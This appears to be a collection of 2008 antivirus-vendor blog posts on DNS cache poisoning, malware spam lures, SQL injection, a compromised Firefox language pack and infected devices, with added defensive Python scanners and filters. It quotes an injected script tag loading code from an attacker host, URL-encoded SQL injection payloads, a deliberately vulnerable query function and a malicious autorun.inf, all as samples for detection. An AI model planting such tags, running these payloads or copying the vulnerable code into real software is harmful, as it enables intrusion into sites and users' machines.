Dan Kaminsky (Director at IOActive) discovered a vulnerability in DNS (Domain Name System) that affected more than 80 vendors, because the problem lies in the DNS protocol itself rather than in any single implementation.
The Domain Name System (DNS), to make it easier to understand, is sort of like a phone book for the internet: a hostname is translated to its IP address. This is most useful for average users, since all they have to memorize is the name of the site and not its actual IP address.
e.g. www.google.com -> 64.233.187.99
The weakness Kaminsky found is that DNS servers could only use a small set of source ports for their queries (many sent every query from a single fixed port), so the only thing an attacker had to guess in order to spoof a response was the 16-bit transaction ID. That makes it practical to flood a resolver with forged replies until one is accepted, and the forged record (pointing at a malicious site) is then cached by the DNS server (cache poisoning).
In March, Kaminsky, along with several other security researchers, met on Microsoft's campus to work out what to do about this issue.
On July 8th the coordinated fix went out: several vendors, including Microsoft and Cisco, released patches on the same day. Kudos to the people involved for keeping a tight lid on things until a solution was ready. This would have been a very messy situation for internet users (that is, every single person, unless you live in a cave =p) had it been handled irresponsibly.
The patch basically adds entropy to DNS by randomizing the UDP source port of each query across a much larger range of ports, so an attacker now has to guess both the transaction ID and the source port.
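To put numbers on the entropy argument, here is an added example (not part of the original post, and not Kaminsky's or any vendor's code): a small Python model of the forgery race. The resolver picks a transaction ID and, if patched, a random source port; the attacker floods forged replies guessing the ID (and, against a patched resolver, the port). The fixed port 53 for the unpatched case and the 1024-65535 range for the patched case are assumptions of the model, not measurements of any particular resolver.

```python
import random

TXID_SPACE = 1 << 16   # DNS transaction IDs are 16 bits

# Assumption: a patched resolver draws its query source port from 1024-65535;
# an unpatched one sends every query from one fixed, observable port (53 here).
PORT_LOW, PORT_HIGH = 1024, 65535
PORT_SPACE = PORT_HIGH - PORT_LOW + 1
FIXED_PORT = 53


def guess_space(randomize_port):
    """How many (txid, source port) combinations a blind attacker must cover."""
    return TXID_SPACE * (PORT_SPACE if randomize_port else 1)


def success_probability(n_forged, randomize_port):
    """P(at least one of n_forged spoofed replies matches the outstanding query)."""
    space = guess_space(randomize_port)
    return 1.0 - (1.0 - 1.0 / space) ** n_forged


def simulate_race(n_lookups, n_forged, randomize_port, seed=1):
    """Count how many of n_lookups accept a forged reply before the real one arrives.

    Each lookup is one attacker-triggered query (in Kaminsky's attack a lookup for a
    random nonexistent name under the target zone, so the cache never answers it and
    the resolver keeps asking).  The attacker sends n_forged replies per lookup, each
    with a random txid and, against a patched resolver, a random port guess.
    """
    rng = random.Random(seed)
    poisoned = 0
    for _ in range(n_lookups):
        txid = rng.randrange(TXID_SPACE)
        port = rng.randint(PORT_LOW, PORT_HIGH) if randomize_port else FIXED_PORT
        for _ in range(n_forged):
            g_txid = rng.randrange(TXID_SPACE)
            g_port = rng.randint(PORT_LOW, PORT_HIGH) if randomize_port else FIXED_PORT
            if g_txid == txid and g_port == port:
                poisoned += 1
                break
    return poisoned


if __name__ == "__main__":
    for flag in (False, True):
        print(f"source port randomized={flag}: guess space {guess_space(flag):,}, "
              f"P(success | 5000 forged replies)={success_probability(5000, flag):.2e}, "
              f"poisoned lookups in simulation: {simulate_race(100, 5000, flag)}")
```

With a fixed port the attacker covers the whole space in 65,536 guesses, so a few thousand forged packets per lookup already poison a noticeable share of lookups; with the port randomized the same flood is roughly 64,000 times less likely to land, which is the entire effect of the July patch.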
Also, you can go to Dan Kaminsky's site (http://www.doxpara.com/) to check whether the DNS resolver you are using is affected by this vulnerability.
For more information about the vulnerability you can read up about it on the links below:
http://www.microsoft.com/technet/security/Bulletin/MS08-037.mspx
http://www.kb.cert.org/vuls/id/800113
There's a new batch of Porntube e-mails. Like last time, the e-mails still link to a fake Porntube page (see below).
So far, I have seen three variations of e-mails, all linking to the same site, which ultimately leads to the download of video.exe (detected by Anchiva as Trojan/Exchanger.80D4!dldr).
Email details below:
Subject: (any of the following)
Kobe Bryant's incredbile dunk
Re: don't forget our 2pm meeting tomorrow
Clinton says: Hiliary cheated on me
Body: (any of the following)
The greatest uncensored clips from the hit movie Sex and the City http://kni{blocked}r.html
Did you know that anyone can find out all your darkest secrets by clicking here. http://por{blocked}et/r.html
Angelina and Bradd home video , 25 minutes of slutty action , stolen and released http://pliki.{blocked}l/r.html
If a user is tricked into visiting one of these sites, an executable named video.exe (Trojan/Exchanger.80D4!dldr) is automatically downloaded under the pretense that it has to be installed in order to play the video (the same trick the Zlob malware family uses).
Just an FYI for the security conscious out there: there is a new vulnerability in Microsoft Word that allows remote code execution.
As of this writing, there are already reports of it being exploited in the wild.
According to the Microsoft advisory, the vulnerability affects only Microsoft Office Word 2002 Service Pack 3. This is good news for most people, but for those running that version, here are some things you would want your users to do while waiting for the patch from Microsoft:
1. The usual SOP for cases like these still applies: be wary of Word documents sent to you, especially from someone you don't know, since a malicious document only has to be opened to trigger the bug.
2. Use another version of Microsoft Office.
3. [taken from the Microsoft advisory] Use Microsoft Office Word 2003 Viewer or Microsoft Office Word 2003 Viewer Service Pack 3 to open and view Microsoft Word files.
The mass SQL injection attacks that have been rampant on the internet for a few months now are a recurring threat, not only to web administrators but, more to the point, to the common internet user, whose browser ends up loading the script tags that get injected into those sites.
In response, Microsoft has released an advisory regarding the issue.
In the advisory, Microsoft recommends three tools to help administrators mitigate the SQL injection problem:
1. Detection - HP Scrawlr
Hewlett-Packard has developed a free scanner which can identify whether a site is susceptible to SQL injection.
2. Defense - UrlScan version 3.0 Beta
UrlScan version 3.0 Beta is a Microsoft security tool that restricts the types of HTTP requests that Internet Information Services (IIS) will process. By blocking specific HTTP requests, UrlScan helps prevent potentially harmful requests from reaching the web application on the server. UrlScan 3.0 installs on IIS 5.1 and later, including IIS 7.0.
3. Identifying - Microsoft Source Code Analyzer for SQL Injection
A static analysis tool that detects classic ASP code susceptible to SQL injection attacks.
These tools should be a great help to web developers cleaning up their sites. Keep in mind that a request filter such as UrlScan is a stopgap: the real fix is to stop building SQL out of request data and use parameterized queries instead. Good job to Microsoft and HP for providing these tools.
Note: Links to the tools can be found on the Microsoft advisory page.
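Added example, not from the Microsoft advisory or any of the three tools: the first half approximates what a request filter such as UrlScan does (decode the query string, reject requests carrying the markers of the mass-injection payload), and the second half shows, on a constructed SQLite table, why filtering is only a stopgap: the same tautology payload rewrites every row when the value is concatenated into the SQL and touches nothing once it is bound as a parameter. The indicator patterns and the news table are assumptions for illustration, not UrlScan's rule syntax.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Markers of the 2008 mass-injection payloads, which arrived URL-encoded in query strings
# shaped like  ';DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S);--
# Assumption: illustrative patterns only; UrlScan's own rules are written differently.
INJECTION_PATTERNS = [
    re.compile(r"\bdeclare\s+@", re.I),
    re.compile(r"\bcast\s*\(\s*0x[0-9a-f]+", re.I),
    re.compile(r"\bexec\s*\(", re.I),
    re.compile(r"\b(or|and)\s+\d+\s*=\s*\d+", re.I),
    re.compile(r";\s*--"),
]


def request_is_suspicious(query_string):
    """Decode first (the payload is percent-encoded on the wire), then look for markers."""
    decoded = unquote_plus(query_string)
    return any(p.search(decoded) for p in INJECTION_PATTERNS)


def fresh_db():
    """Constructed in-memory table standing in for a site's news/articles table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, views INTEGER)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?)",
                   [(1, "first", 0), (2, "second", 0), (3, "third", 0)])
    return db


def bump_views_vulnerable(db, article_id):
    """Classic ASP-style concatenation: the request value becomes part of the SQL text.

    Returns the number of rows changed; a payload such as '1 OR 1=1' changes all of them.
    """
    sql = "UPDATE news SET views = views + 1 WHERE id = " + article_id
    return db.execute(sql).rowcount


def bump_views_parameterized(db, article_id):
    """The fix: bind the value, so the SQL parser never sees it as SQL.

    The same payload is compared to the integer id as a string and matches nothing.
    """
    return db.execute("UPDATE news SET views = views + 1 WHERE id = ?",
                      (article_id,)).rowcount


if __name__ == "__main__":
    attack = ("id=1%3BDECLARE%20%40S%20VARCHAR%284000%29%3BSET%20%40S%3D"
              "CAST%280x4445434C415245%20AS%20VARCHAR%284000%29%29%3BEXEC%28%40S%29%3B--")
    print("filter blocks mass-injection request:", request_is_suspicious(attack))
    print("rows changed, concatenated:", bump_views_vulnerable(fresh_db(), "1 OR 1=1"))
    print("rows changed, parameterized:", bump_views_parameterized(fresh_db(), "1 OR 1=1"))
```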
The Vietnamese language pack for Firefox 2 has been reported to be compromised by Trojan/HTML.Xorer.DU, and apparently this has been going on since February 18, according to the bug report on Mozilla's Bugzilla (https://bugzilla.mozilla.org/show_bug.cgi?id=432406).
This script was inserted at the end of the help files (.xhtml) of the Firefox add-on:
<script src="h**p://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
The percent-encoding only hides the destination from a casual reader; decoded, the URL above is h**p://js.k0102.com/01.asp
Note: http is replaced with h**p to keep users from accidentally clicking the link.
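As an added example (mine, not Mozilla's or Anchiva's tooling), here is a Python scanner that pulls every <script src=...> out of an .xhtml file, undoes the percent-encoding and reports remote scripts that are not on an allow-list. The empty allow-list, the sample help page and the scan_tree() helper are assumptions for illustration; the encoded URL in the sample is the tag quoted above with its scheme restored.

```python
import re
from pathlib import Path
from urllib.parse import unquote, urlsplit

SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)

# Assumption: hosts the add-on's pages may legitimately load scripts from.
# A language pack's help pages normally need none, so the list starts empty.
ALLOWED_HOSTS = set()


def external_scripts(document):
    """Every <script src=...> in the document, with percent-encoding undone."""
    findings = []
    for raw in SCRIPT_SRC_RE.findall(document):
        decoded = unquote(raw)          # %6A%73%2E... -> js....
        parts = urlsplit(decoded)
        findings.append({
            "raw": raw,
            "decoded": decoded,
            "host": parts.hostname or "",
            "remote": parts.scheme.lower() in ("http", "https"),
            "obfuscated": raw != decoded,   # an encoded host/path is itself a red flag
        })
    return findings


def suspicious_scripts(document):
    """Remote http(s) scripts not on the allow-list; relative and chrome: sources pass."""
    return [f for f in external_scripts(document)
            if f["remote"] and f["host"] not in ALLOWED_HOSTS]


def scan_tree(root):
    """Walk an unpacked add-on and map each .xhtml file to its suspicious scripts."""
    report = {}
    for path in Path(root).rglob("*.xhtml"):
        hits = suspicious_scripts(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


# Constructed help page; the final tag is the injected one quoted above, scheme restored.
SAMPLE_XHTML = """<?xml version="1.0" encoding="UTF-8"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Help</title><script src="help.js"></script></head>
<body><p>Help contents</p></body>
</html>
<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>
"""

if __name__ == "__main__":
    for hit in suspicious_scripts(SAMPLE_XHTML):
        print(f"remote script -> {hit['decoded']} (obfuscated={hit['obfuscated']})")
```

Anything the scanner reports as both remote and obfuscated deserves a look before the add-on is deployed; a legitimate help page has no reason to percent-encode the host it loads a script from.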
According to a blog entry from Mozilla (http://blog.mozilla.com/security/2008/05/07/compromised-file-in-vietnamese-language-pack-for-firefox-2/):
"There have been 16,667 total downloads of the Vietnamese language pack since November 2007, so we anticipate the impact on users to be limited."
This low number of downloads is probably one of the reasons why it took about two months before the infection was discovered.
Some good news though: for Anchiva customers, the pattern to detect the compromised .xhtml files has been available since January 2008, while the compromised file was only uploaded in February, so we can safely assume that our customers are protected from this.
Still, with this happening, it has come to the point where we can't even trust downloads from legitimate sites. There's always the risk that the site (even a trusted source) has been compromised, so, first things first: before using any file downloaded from the net, at the very least run it through a virus scanner. The effect of a compromised file might not be that significant for a single user, but on a production network it could have disastrous results.
Yes, the name "Cyber Assassin" sounds cool. I used to think so too, back when it was all make-believe. Fiction sometimes has a way of becoming reality.
Back when everything was simple, hackers were just in it for the fame. That quickly shifted to monetary motives, and now one of the goals is to actually cause physical harm to an individual.
On March 22 the forums of the Epilepsy Foundation (http://www.epilepsyfoundation.org), an organization for people with epilepsy, were attacked. The attack used scripts to post messages embedded with flashing GIF images. The following day the attackers changed tactics and injected JavaScript that redirected visitors to a site containing images designed to cause seizures in photosensitive and pattern-sensitive epileptics.
According to a report from wired.com:
RyAnne Fultz, a 33-year-old woman who suffers from pattern-sensitive epilepsy, says she clicked on a forum post with a legitimate-sounding title on Sunday. Her browser window resized to fill her screen, which was then taken over by a pattern of squares rapidly flashing in different colors.
Fultz says she "locked up."
"I don't fall over and convulse, but it hurts," says Fultz, an IT worker in Coeur d'Alene, Idaho. "I was on the phone when it happened, and I couldn't move and couldn't speak."
It's a good thing that no reports of anything more serious appeared, but it could have gotten much worse had the site not been cleaned up in time. I applaud the http://www.epilepsyfoundation.org administrators for cleaning the site quickly; job well done, you guys.
This incident reminds me of something I read earlier this month. Researchers actually found a way to hack into a patient's pacemaker over its wireless interface and either shut it down or deliver a shock capable of inducing a fatal heart rhythm. Granted, this was done with about $30,000 worth of equipment, but it does show that it can be done, and with the rapid advancement in technology these days, who knows where this might go...
USB drives, MP3 players, phones and, as of December 2007, digital photo frames. Any portable media device that is connected to a PC can be loaded with malware and become the kick-off of a network-wide infection. The latest is PUA/NSAnti.F867!packed, reported to be shipping inside digital frames sold at Best Buy, Costco, Target and Sam's Club stores.
The first time I heard of this attack was in December 2007, amid the chaos of buying Christmas gifts, when people from SANS reported on it here.
Attacks from portable media devices are becoming increasingly common, and U3-enabled flash drives make it worse: part of the drive presents itself to Windows as a CD-ROM, so Windows honors its autorun.inf and runs whatever it points to. No interaction with the PC is needed other than inserting the drive. Users need to be more alert and security conscious than ever.
It's a good thing that the malware involved in the latest attack has been detected by Anchiva RapidRx since July 2007, so Anchiva customers are protected. But what if this were an entirely new worm? It makes me wonder what other gadgets out there have malware hiding in them.
As standard operating procedure, always scan whatever you plug into your computers to check for anything nasty hiding there. Also, for the more security conscious (I'm included in this), you can disable the Autorun feature in Windows so that malware can't run automatically from removable media. You can read more about disabling the Autorun feature here.
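As an added example (not from the SANS diary or any Anchiva product), here is a Python check of the kind a scanning gate could run on removable media before it is plugged into a workstation: parse autorun.inf and report every directive that would make Windows run code (open=, shellexecute=, shell\verb\command=), a changed default verb, and the action= text that disguises the entry as Explorer's own "Open folder to view files" prompt. Both autorun.inf samples are constructed for the example.

```python
# Directives under [autorun] that make Windows launch something on insert or double-click.
LAUNCH_KEYS = ("open", "shellexecute")
# Explorer's own AutoPlay wording; malware copies it into action= so its entry looks
# like the built-in "open folder" choice.  Assumption: matched loosely, case-insensitively.
EXPLORER_LURE = "open folder to view files"


def parse_autorun_inf(text):
    """Minimal INI parser: {section: {key: value}} with lower-cased names and ';' comments."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def autorun_findings(text):
    """Everything in autorun.inf that runs code or disguises the prompt; [] if it only
    sets a label or icon."""
    section = parse_autorun_inf(text).get("autorun", {})
    findings = []
    for key in LAUNCH_KEYS:
        if key in section:
            findings.append(f"{key}={section[key]} runs when the media is inserted")
    for key, value in section.items():
        if key.startswith("shell\\") and key.endswith("\\command"):
            findings.append(f"{key}={value} runs from the context menu")
    if "shell" in section:
        findings.append(f"default verb changed to '{section['shell']}' (double-click runs it)")
    if EXPLORER_LURE in section.get("action", "").lower():
        findings.append("action= mimics Explorer's 'Open folder to view files' prompt")
    return findings


# Constructed autorun.inf of the kind dropped on infected removable media.
MALICIOUS_INF = """[AutoRun]
open=setup\\update.exe
icon=folder.ico
action=Open folder to view files
shell\\open\\command=setup\\update.exe
shell\\explore\\command=setup\\update.exe
shell=open
"""

# Constructed autorun.inf from a vendor disc that only sets a label and an icon.
PASSIVE_INF = """[autorun]
label=Photo Frame
icon=frame.ico
"""

if __name__ == "__main__":
    for name, inf in (("malicious", MALICIOUS_INF), ("passive", PASSIVE_INF)):
        print(f"{name}: {autorun_findings(inf) or 'nothing runs'}")
```

A gate that refuses media with any finding is strict (plenty of legitimate driver discs carry open=setup.exe), which is exactly why the post's advice to disable Autorun altogether is the simpler control.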
With all this in mind, I can't help wondering which gadget will be the next to ship with malware installed.
Unless you live in a cave somewhere, you've heard all the buzz about Edison Chen and his pictures/videos of ex-girlfriends. It was only a matter of time before malware authors joined in. These kinds of attacks have followed a pattern for a long time now; remember the Paris Hilton thing?
As of now, the only avenue of infection I've seen is forum replies and comments claiming to have a video of the latest release from the scandal and then supplying a link.
There are a number of sites used in this case, but all use the same tactic: the site says there has been an "ActiveX Object Error" and that you need to download a new version in order to view the video. As you probably guessed already, there is no video; instead your system gets compromised by malware.
Here are some snapshots of the sites (screenshots not reproduced in this copy):
The "download and install this in order to view the video" tactic is nothing new: it has been widely used, especially on porn sites, and will keep being used for years to come. It's important for users to be aware of and alert to anything that looks suspicious. Being asked to download and execute an .exe file to watch a video is just one of the things to look out for.
The malicious files downloaded from the sites are already detected as:
- setup.exe - Trojan/Zlob.ACA3
- install_player_3912996.exe - Trojan/Zlob.5AB4
- VideoAccessCodecInstall.exe - Trojan/Zlob.5AB4
- VideoAccessCodecInstall.exe - Trojan/Delf.CBDC!dldr
- instal.exe - Trojan/Delf.92F2!dldr
For now the only way to come across these sites is through the forum replies and comments, but I wouldn't be surprised if a storm of e-mail suddenly hit the net, capitalizing on the latest video or photo from this case.
Like clockwork, the Storm worm doesn't disappoint. As expected, a variety of e-mails for the new Storm variant has been going around the net.
Here is a list of e-mail subjects/bodies for network admins to block:
A Hearty Wish
A Rose To Say...
Blind Love
Happy Valentine's Day!
Heart Pump
Hugs And Kisses
I Like You
I Love You
Is Anything Beautiful As A Rose?
Just You
Love Machine
Love Poem
Love Rose
Love You
Lovetrain
Me & You
My Heart
My Heart For You
My Love For You
Phone Love
Poem About Us
Powerful Love
Rockin' Valentine
Smiley Kiss
Spell Love
Sweetest Things Aren't Things!
The Love Train
Thinking Of U All Day
Tower of Love
Val-ANT-ines
Valentine's Day
Valentine Friends
Valentine Invitation
Valentine Mom
Valentuna
What is Love?
With All My Love...
World Love
You're my Valentine!
You Stay In My Heart
The e-mail bodies also contain a URL which leads to the download of the Storm worm. We're not about to show the URLs, though rest assured, a pattern for this new Storm variant has already been created and it is detected as Worm/Zhelatin.BD5F.
We have been seeing a lot of e-mails promising a new naked video of Britney Spears.
Here are the e-mail details:
Subject: New naked Britney video
Message body:
See new naked Britney video in attachment!
The video is crazy!
Only 1 day trial - get this video now!
Get it now!
Subject: Naked Britney
Message body:
See new naked Britney video in attachment!
unzip it first!
The video is crazy!
Only 1 day trial - get this video now!
use password 123
This has been a social engineering tactic for a long time now. Users are spammed with e-mails promising nude videos or pictures of celebrities. Thing is, there never is a video. Instead, it is typically malware that does more harm to the user's system. Note the second variant: the attachment comes as a password-protected archive with the password in the body, a trick aimed at gateway scanners that cannot look inside an encrypted file.
Examples of celebrities that have been targeted are Angelina Jolie, Paris Hilton, Anna Kournikova and many others. And yes, Britney Spears has been used in the past as well. Actually, just think of a celebrity name and Google it with the word malware. Chances are you'll see reports about it being used.
The file sent or downloaded is already detected by RapidRx as Trojan/Agent.00BA, so there's no need to worry for our customers.
As usual, here comes the standard advice: do NOT click on URLs sent through e-mail, especially from an untrusted source. Also, people need to be more alert. Just by looking at the e-mail link and attachment, a light bulb should already be flashing, since it's an .exe file and not a video file.
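As an added example covering three of the posts above (the Porntube link lures, the Storm subject list and the Britney zip attachment), here is a Python triage routine a mail gateway could run; it is mine, not Anchiva's RapidRx logic. It drops known subjects, pulls every URL out of the body for blocklist lookup, flags executable attachments, looks inside zip attachments for executables or encrypted entries, and notices when the body hands out the password for the archive. The blocked-subject set is a subset of the Storm list plus the two Britney subjects; both sample messages and the 192.0.2.10 address are constructed.

```python
import email
import io
import re
import zipfile
from email.message import EmailMessage

# Subjects to drop outright: a few from the Valentine's Storm run plus the Britney run.
BLOCKED_SUBJECTS = {
    "A Hearty Wish", "Blind Love", "Love Rose", "Valentine's Day",
    "New naked Britney video", "Naked Britney",
}
EXEC_EXTENSIONS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)
PASSWORD_RE = re.compile(r"\bpassword\b\s*[:=]?\s*\S+", re.I)


def inspect_zip(name, data):
    """Look at a zip attachment's directory without extracting anything."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [f"{name}: not a valid zip"]
    reasons = []
    for info in zf.infolist():
        if info.flag_bits & 0x1:   # encrypted entry: a content scanner cannot inspect it
            reasons.append(f"{name}: password-protected entry {info.filename}")
        if info.filename.lower().endswith(EXEC_EXTENSIONS):
            reasons.append(f"{name}: executable inside zip: {info.filename}")
    return reasons


def triage(raw_message):
    """Return a verdict, the reasons behind it, and every URL found in the text body."""
    msg = email.message_from_bytes(raw_message)
    reasons, urls = [], []
    subject = (msg["Subject"] or "").strip()
    if subject in BLOCKED_SUBJECTS:
        reasons.append(f"blocked subject: {subject}")
    for part in msg.walk():
        if part.get_content_maintype() == "multipart":
            continue
        name = (part.get_filename() or "").lower()
        payload = part.get_payload(decode=True) or b""
        if part.get_content_type() == "text/plain" and not name:
            text = payload.decode(part.get_content_charset() or "utf-8", "replace")
            urls.extend(URL_RE.findall(text))
            if PASSWORD_RE.search(text):
                reasons.append("body hands out a password (archive built to dodge scanning)")
        elif name.endswith(EXEC_EXTENSIONS):
            reasons.append(f"executable attachment: {name}")
        elif name.endswith(".zip"):
            reasons.extend(inspect_zip(name, payload))
    return {"verdict": "quarantine" if reasons else "deliver",
            "reasons": reasons, "urls": urls}


def constructed_storm_mail():
    """Constructed Storm-style lure: blocked subject, body carries a download URL."""
    msg = EmailMessage()
    msg["Subject"] = "Love Rose"
    msg["From"] = "friend@example.com"
    msg["To"] = "you@example.com"
    msg.set_content("You have a valentine card waiting at http://192.0.2.10/card.exe")
    return msg.as_bytes()


def constructed_britney_mail():
    """Constructed Britney-style lure: zipped executable, password given in the body."""
    msg = EmailMessage()
    msg["Subject"] = "Naked Britney"
    msg["From"] = "fan@example.com"
    msg["To"] = "you@example.com"
    msg.set_content("See new naked Britney video in attachment!\nunzip it first!\nuse password 123")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("video.exe", b"MZ placeholder bytes, not a real program")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="video.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    for build in (constructed_storm_mail, constructed_britney_mail):
        print(build.__name__, triage(build()))
```

The URL list is returned rather than judged because the lure domains rotate daily; feeding them to a blocklist or a URL sandbox is a separate step. Note that zipfile can read the file names of an encrypted archive (ZipCrypto does not hide the directory), so the executable-inside-zip check still fires on a password-protected attachment even though the content cannot be scanned.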